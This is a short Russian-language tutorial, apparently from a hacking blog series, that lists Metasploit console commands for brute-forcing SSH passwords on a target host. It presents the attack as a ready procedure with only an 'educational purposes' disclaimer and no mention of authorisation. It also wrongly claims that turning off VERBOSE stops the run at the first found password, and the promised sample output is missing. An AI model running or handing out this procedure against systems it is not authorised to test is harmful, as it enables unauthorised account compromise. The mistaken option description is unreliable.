Серьезный Metasploit часть 3

Прошу обратить внимание! Автор данной статьи не несёт ответственности за любые последствия вслед использования предоставленной информации. Все материалы опубликованы исключительно в образовательных целях!

Всем привет, сегодня мы рассмотрим атаку на Port 22 (ssh). Способ основывается на обычном брутфорс, поэтому шанс очень мал.

Для начала запустим metasploit командой:

Он уже должен быть установлен

./msfconsole

Далее используем модуль auxiliary/scanner/ssh/ssh_login:

use auxiliary/scanner/ssh/ssh_login

Прописывая команду:

show options

Итак, как мы увидели параметры ssh_login. Теперь заполняем.

1. Вводим IP нашего ресурса:

 set RHOSTS <IP address> 

2. Указываем путь к словарю с паролями:

set USERPASS_FILE <путь к файлу>

3. Ну и на последок деактивируем пункт VERBOSE:

Если VERBOSE деактивирован, то при нахождении подходящего пароля, подбор прекратится. Деактивируем командой:

 set VERBOSE false

Все, можно начинать подбор:

 run

Атака идёт, по завершении вам выдаст примерно такое:

Если все удалось, поздравляю. Вы нашли уязвимость и применили ее. Метасплоит на очень многое способен, даже не смотря на то что вы используете его в своем смартфоне)